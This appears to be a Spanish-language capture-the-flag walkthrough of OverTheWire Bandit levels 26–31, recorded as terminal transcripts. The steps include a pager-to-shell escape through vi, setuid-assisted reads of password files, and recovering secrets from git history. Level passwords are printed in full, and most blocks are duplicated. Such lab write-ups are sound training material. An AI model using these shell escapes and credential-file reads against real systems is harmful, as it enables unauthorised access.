| : | ; | ' ; |.'; ; ; \ \; :
. | ' ' ' : `----' | | \ ; ` |
' ; \; / | ' : ; . \ .\ ;
\ \ ', / | | ' \ \ ' \ |
; : / ' : | : ' |--"
\ \ .' ; |.' \ \ ;
www. `---` ver '---' he '---" ire.org
Welcome to OverTheWire!
If you find any problems, please report them to Steven or morla on
irc.overthewire.org.
--[ Playing the games ]--
This machine might hold several wargames.
If you are playing "somegame", then:
* USERNAMES are somegame0, somegame1, ...
* Most LEVELS are stored in /somegame/.
* PASSWORDS for each level are stored in /etc/somegame_pass/.
Write-access to homedirectories is disabled. It is advised to create a
working directory with a hard-to-guess name in /tmp/. You can use the
command "mktemp -d" in order to generate a random and hard to guess
directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
so that users can not snoop on eachother. Files and directories with
easily guessable or short names will be periodically deleted!
Please play nice:
* don't leave orphan processes running
* don't leave exploit-files laying around
* don't annoy other players
* don't post passwords or spoilers
* again, DONT POST SPOILERS!
This includes writeups of your solution on your blog or website!
--[ Tips ]--
This machine has a 64bit processor and many security-features enabled
by default, although ASLR has been switched off. The following
compiler flags might be interesting:
-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro
In addition, the execstack tool can be used to flag the stack as
executable on ELF binaries.
Finally, network-access is limited for most levels by a local
firewall.
--[ Tools ]--
For your convenience we have installed a few usefull tools which you can find
in the following locations:
* peda (https://github.com/longld/peda.git) in /usr/local/peda/
* gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
* pwntools (https://github.com/Gallopsled/pwntools)
* radare2 (http://www.radare.org/)
* checksec.sh (http://www.trapkit.de/tools/checksec.html) in /usr/local/bin/checksec.sh
--[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us through IRC on
irc.overthewire.org #wargames.
Enjoy your stay!
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
|_.__/ \__,_|_| |_|\__,_|_|\__|____\___/
Connection to localhost closed.
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
:! /bin/bash
:set shell=/bin/bash
:shell
[No write since last change]
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6ZNivel 26 -> Nivel 27
En este nivel de nuevo tenemos que hacer uso de un binario con el bit s activo.
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
- bandit26@bandit:~$ ls
- bandit27-do text.txt
- bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
- 3ba3118a22e93127a4ed485be72ef5ea
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
Nivel 27 -> Nivel 28
En este nivel aparece algo nuevo y que es tenemos que hacer un clone al repositorio ssh://bandit27-git@localhost/home/bandit27-git/repo y buscar la contraseña en dicho repositorio. En este caso es bastante sencillo, haciendo un simple cat a repo/README nos encontramos con la contraseña.
bandit27@bandit:/tmp/git/repo$ mkdir /tmp/repository
bandit27@bandit:/tmp/git/repo$ cd /tmp/repository
bandit27@bandit:/tmp/repository$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
Checking connectivity... done.
bandit27@bandit:/tmp/repository$ cat repo/README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
- bandit27@bandit:/tmp/git/repo$ mkdir /tmp/repository
- bandit27@bandit:/tmp/git/repo$ cd /tmp/repository
- bandit27@bandit:/tmp/repository$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
- Cloning into 'repo'...
- Could not create directory '/home/bandit27/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit27-git@localhost's password:
- remote: Counting objects: 3, done.
- remote: Compressing objects: 100% (2/2), done.
- remote: Total 3 (delta 0), reused 0 (delta 0)
- Receiving objects: 100% (3/3), done.
- Checking connectivity... done.
- bandit27@bandit:/tmp/repository$ cat repo/README
- The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
bandit27@bandit:/tmp/git/repo$ mkdir /tmp/repository
bandit27@bandit:/tmp/git/repo$ cd /tmp/repository
bandit27@bandit:/tmp/repository$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
Checking connectivity... done.
bandit27@bandit:/tmp/repository$ cat repo/README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
Nivel 28 -> Nivel 29
Este nivel es parecido al anterior, pero si intentamos hacer un cat a repo/README.md observamos que la contraseña ha sido eliminada. Para solucionar el nivel podemos ver los comit que se han hecho y echar un ojo al log para ver la contraseña.
bandit28@bandit:~$ mkdir /tmp/repository1
bandit28@bandit:~$ cd /tmp/repository1
bandit28@bandit:/tmp/repository1$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit28/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit28@bandit:/tmp/repository1$ cat repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
bandit28@bandit:/tmp/repository1$ cd repo/
bandit28@bandit:/tmp/repository1/repo$ git log
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
commit 80383714fa509a363756866425b0b697e87824a0
Author: Ben Dover <noone@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
initial commit of README.md
bandit28@bandit:/tmp/repository1/repo$ git log -p -2
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
diff --git a/README.md b/README.md
index 3f7cee8..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: bbc96594b4e001778eee9975372716b2
+- password: xxxxxxxxxx
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
diff --git a/README.md b/README.md
index 7ba2d2f..3f7cee8 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: <TBD>
+- password: bbc96594b4e001778eee9975372716b2- bandit28@bandit:~$ mkdir /tmp/repository1
- bandit28@bandit:~$ cd /tmp/repository1
- bandit28@bandit:/tmp/repository1$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
- Cloning into 'repo'...
- Could not create directory '/home/bandit28/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit28-git@localhost's password:
- remote: Counting objects: 9, done.
- remote: Compressing objects: 100% (6/6), done.
- remote: Total 9 (delta 2), reused 0 (delta 0)
- Receiving objects: 100% (9/9), done.
- Resolving deltas: 100% (2/2), done.
- Checking connectivity... done.
- bandit28@bandit:/tmp/repository1$ cat repo/README.md
- # Bandit Notes
- Some notes for level29 of bandit.
- ## credentials
- - username: bandit29
- - password: xxxxxxxxxx
- bandit28@bandit:/tmp/repository1$ cd repo/
- bandit28@bandit:/tmp/repository1/repo$ git log
- commit 04e2414585ba775805a49b78d662d0946d08f27a
- Author: Morla Porla <morla@overthewire.org>
- Date: Sun Jul 22 14:47:13 2018 +0200
- fix info leak
- commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
- Author: Morla Porla <morla@overthewire.org>
- Date: Sun Jul 22 14:47:13 2018 +0200
- add missing data
- commit 80383714fa509a363756866425b0b697e87824a0
- Author: Ben Dover <noone@overthewire.org>
- Date: Sun Jul 22 14:47:13 2018 +0200
- initial commit of README.md
- bandit28@bandit:/tmp/repository1/repo$ git log -p -2
- commit 04e2414585ba775805a49b78d662d0946d08f27a
- Author: Morla Porla <morla@overthewire.org>
- Date: Sun Jul 22 14:47:13 2018 +0200
- fix info leak
- diff --git a/README.md b/README.md
- index 3f7cee8..5c6457b 100644
- --- a/README.md
- +++ b/README.md
- @@ -4,5 +4,5 @@ Some notes for level29 of bandit.
- ## credentials
-
- - username: bandit29
- -- password: bbc96594b4e001778eee9975372716b2
- +- password: xxxxxxxxxx
-
- commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
- Author: Morla Porla <morla@overthewire.org>
- Date: Sun Jul 22 14:47:13 2018 +0200
- add missing data
- diff --git a/README.md b/README.md
- index 7ba2d2f..3f7cee8 100644
- --- a/README.md
- +++ b/README.md
- @@ -4,5 +4,5 @@ Some notes for level29 of bandit.
- ## credentials
-
- - username: bandit29
- -- password: <TBD>
- +- password: bbc96594b4e001778eee9975372716b2
bandit28@bandit:~$ mkdir /tmp/repository1
bandit28@bandit:~$ cd /tmp/repository1
bandit28@bandit:/tmp/repository1$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit28/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit28@bandit:/tmp/repository1$ cat repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
bandit28@bandit:/tmp/repository1$ cd repo/
bandit28@bandit:/tmp/repository1/repo$ git log
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
commit 80383714fa509a363756866425b0b697e87824a0
Author: Ben Dover <noone@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
initial commit of README.md
bandit28@bandit:/tmp/repository1/repo$ git log -p -2
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
diff --git a/README.md b/README.md
index 3f7cee8..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: bbc96594b4e001778eee9975372716b2
+- password: xxxxxxxxxx
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
diff --git a/README.md b/README.md
index 7ba2d2f..3f7cee8 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: <TBD>
+- password: bbc96594b4e001778eee9975372716b2Nivel 29 -> Nivel 30
Este nivel es muy parecido a los dos anteriores, la diferencia ahora es que la contraseña correcta está en la rama dev.
bandit29@bandit:~$ mkdir /tmp/repository2
bandit29@bandit:~$ cd /tmp/repository2
bandit29@bandit:/tmp/repository2$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit29/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit29-git@localhost's password:
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit29@bandit:/tmp/repository2$ cd repo
bandit29@bandit:/tmp/repository2/repo$ git show-branch -a
* [master] fix username
! [origin/HEAD] fix username
! [origin/dev] add data needed for development
! [origin/master] fix username
! [origin/sploits-dev] add some silly exploit, just for shit and giggles
-----
+ [origin/sploits-dev] add some silly exploit, just for shit and giggles
+ [origin/dev] add data needed for development
+ [origin/dev^] add gif2ascii
*++++ [master] fix username
bandit29@bandit:/tmp/repository2/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/repository2/repo$ git checkout remotes/origin/dev
Previous HEAD position was d59303d... add some silly exploit, just for shit and giggles
HEAD is now at 77ec80e... add data needed for development
bandit29@bandit:/tmp/repository2/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf
- bandit29@bandit:~$ mkdir /tmp/repository2
- bandit29@bandit:~$ cd /tmp/repository2
- bandit29@bandit:/tmp/repository2$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
- Cloning into 'repo'...
- Could not create directory '/home/bandit29/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit29-git@localhost's password:
- remote: Counting objects: 16, done.
- remote: Compressing objects: 100% (11/11), done.
- remote: Total 16 (delta 2), reused 0 (delta 0)
- Receiving objects: 100% (16/16), done.
- Resolving deltas: 100% (2/2), done.
- Checking connectivity... done.
- bandit29@bandit:/tmp/repository2$ cd repo
- bandit29@bandit:/tmp/repository2/repo$ git show-branch -a
- * [master] fix username
- ! [origin/HEAD] fix username
- ! [origin/dev] add data needed for development
- ! [origin/master] fix username
- ! [origin/sploits-dev] add some silly exploit, just for shit and giggles
- -----
- + [origin/sploits-dev] add some silly exploit, just for shit and giggles
- + [origin/dev] add data needed for development
- + [origin/dev^] add gif2ascii
- *++++ [master] fix username
- bandit29@bandit:/tmp/repository2/repo$ git branch -a
- * master
- remotes/origin/HEAD -> origin/master
- remotes/origin/dev
- remotes/origin/master
- remotes/origin/sploits-dev
- bandit29@bandit:/tmp/repository2/repo$ git checkout remotes/origin/dev
- Previous HEAD position was d59303d... add some silly exploit, just for shit and giggles
- HEAD is now at 77ec80e... add data needed for development
- bandit29@bandit:/tmp/repository2/repo$ cat README.md
- # Bandit Notes
- Some notes for bandit30 of bandit.
- ## credentials
- - username: bandit30
- - password: 5b90576bedb2cc04c86a9e924ce42faf
bandit29@bandit:~$ mkdir /tmp/repository2
bandit29@bandit:~$ cd /tmp/repository2
bandit29@bandit:/tmp/repository2$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit29/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit29-git@localhost's password:
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit29@bandit:/tmp/repository2$ cd repo
bandit29@bandit:/tmp/repository2/repo$ git show-branch -a
* [master] fix username
! [origin/HEAD] fix username
! [origin/dev] add data needed for development
! [origin/master] fix username
! [origin/sploits-dev] add some silly exploit, just for shit and giggles
-----
+ [origin/sploits-dev] add some silly exploit, just for shit and giggles
+ [origin/dev] add data needed for development
+ [origin/dev^] add gif2ascii
*++++ [master] fix username
bandit29@bandit:/tmp/repository2/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/repository2/repo$ git checkout remotes/origin/dev
Previous HEAD position was d59303d... add some silly exploit, just for shit and giggles
HEAD is now at 77ec80e... add data needed for development
bandit29@bandit:/tmp/repository2/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42fafNivel 30 -> Nivel 31
Parecido a los anteriores, esta vez parece ser que hay un tag llamado "secret" que al intentar movernos a él nos dice que nos existe. Si comprobamos el contenido de .git/packed-refs observamos el hash de secret, si comprobamos el tipo con cat-file -t observamos que es un blob, para listar su contenido podemos usar el comando cat-file -p.
bandit30@bandit:~$ mkdir /tmp/repository3
bandit30@bandit:~$ cd /tmp/repository3
bandit30@bandit:/tmp/repository3$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit30/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit30-git@localhost's password:
remote: Counting objects: 4, done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit30@bandit:/tmp/repository3$ cd repo/
bandit30@bandit:/tmp/repository3/repo$ cat README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/repository3/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit30@bandit:/tmp/repository3/repo$ git tag
secret
bandit30@bandit:/tmp/repository3/repo$ git checkout tags/secret
fatal: reference is not a tree: tags/secret
bandit30@bandit:/tmp/repository3/repo$ cat .git/packed-refs
# pack-refs with: peeled fully-peeled
1791c9d4a559bffa4e6e89c15f7723167da10bb8 refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
bandit30@bandit:/tmp/repository3/repo$ git cat-file -t f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
blob
bandit30@bandit:/tmp/repository3/repo$ git cat-file -p f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
47e603bb428404d265f59c42920d81e5
- bandit30@bandit:~$ mkdir /tmp/repository3
- bandit30@bandit:~$ cd /tmp/repository3
- bandit30@bandit:/tmp/repository3$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
- Cloning into 'repo'...
- Could not create directory '/home/bandit30/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit30-git@localhost's password:
- remote: Counting objects: 4, done.
- remote: Total 4 (delta 0), reused 0 (delta 0)
- Receiving objects: 100% (4/4), done.
- Checking connectivity... done.
- bandit30@bandit:/tmp/repository3$ cd repo/
- bandit30@bandit:/tmp/repository3/repo$ cat README.md
- just an epmty file... muahaha
- bandit30@bandit:/tmp/repository3/repo$ git branch -a
- * master
- remotes/origin/HEAD -> origin/master
- remotes/origin/master
- bandit30@bandit:/tmp/repository3/repo$ git tag
- secret
- bandit30@bandit:/tmp/repository3/repo$ git checkout tags/secret
- fatal: reference is not a tree: tags/secret
- bandit30@bandit:/tmp/repository3/repo$ cat .git/packed-refs
- # pack-refs with: peeled fully-peeled
- 1791c9d4a559bffa4e6e89c15f7723167da10bb8 refs/remotes/origin/master
- f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
- bandit30@bandit:/tmp/repository3/repo$ git cat-file -t f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
- blob
- bandit30@bandit:/tmp/repository3/repo$ git cat-file -p f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
- 47e603bb428404d265f59c42920d81e5
bandit30@bandit:~$ mkdir /tmp/repository3
bandit30@bandit:~$ cd /tmp/repository3
bandit30@bandit:/tmp/repository3$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit30/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit30-git@localhost's password:
remote: Counting objects: 4, done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit30@bandit:/tmp/repository3$ cd repo/
bandit30@bandit:/tmp/repository3/repo$ cat README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/repository3/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit30@bandit:/tmp/repository3/repo$ git tag
secret
bandit30@bandit:/tmp/repository3/repo$ git checkout tags/secret
fatal: reference is not a tree: tags/secret
bandit30@bandit:/tmp/repository3/repo$ cat .git/packed-refs
# pack-refs with: peeled fully-peeled
1791c9d4a559bffa4e6e89c15f7723167da10bb8 refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
bandit30@bandit:/tmp/repository3/repo$ git cat-file -t f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
blob
bandit30@bandit:/tmp/repository3/repo$ git cat-file -p f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea
47e603bb428404d265f59c42920d81e5
Nivel 31 -> Nivel 32
Parecido a los anteriores. En este caso basta con hacer un push al servidor remoto, pero antes debemos crear un fichero con un contenido especial, el problema es que la extensión de este fichero (.txt) es ignorado por git, ya que está en .gitignore. Para solucionar este nivel tendremos que eliminar el fichero .gitignore y hacer el push.
bandit31@bandit:~$ mkdir /tmp/repository4
bandit31@bandit:~$ cd /tmp/repository4
bandit31@bandit:/tmp/repository4$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
remote: Counting objects: 4, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
Checking connectivity... done.
bandit31@bandit:/tmp/repository4$ cd repo/
bandit31@bandit:/tmp/repository4/repo$ ls
README.md
bandit31@bandit:/tmp/repository4/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/repository4/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/master
bandit31@bandit:/tmp/repository4/repo$ git tag
bandit31@bandit:/tmp/repository4/repo$ echo "May I come in?" >> key.txt
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.
bandit31@bandit:/tmp/repository4/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/repository4/repo$ rm .gitignore
bandit31@bandit:/tmp/repository4/repo$ git add key.txt
bandit31@bandit:/tmp/repository4/repo$ git commit -m "commit"
[master 8a91364] commit
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/repository4/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://bandit31-git@localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'- bandit31@bandit:~$ mkdir /tmp/repository4
- bandit31@bandit:~$ cd /tmp/repository4
- bandit31@bandit:/tmp/repository4$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
- Cloning into 'repo'...
- Could not create directory '/home/bandit31/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
- This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
- bandit31-git@localhost's password:
- remote: Counting objects: 4, done.
- remote: Compressing objects: 100% (3/3), done.
- remote: Total 4 (delta 0), reused 0 (delta 0)
- Receiving objects: 100% (4/4), done.
- Checking connectivity... done.
- bandit31@bandit:/tmp/repository4$ cd repo/
- bandit31@bandit:/tmp/repository4/repo$ ls
- README.md
- bandit31@bandit:/tmp/repository4/repo$ cat README.md
- This time your task is to push a file to the remote repository.
- Details:
- File name: key.txt
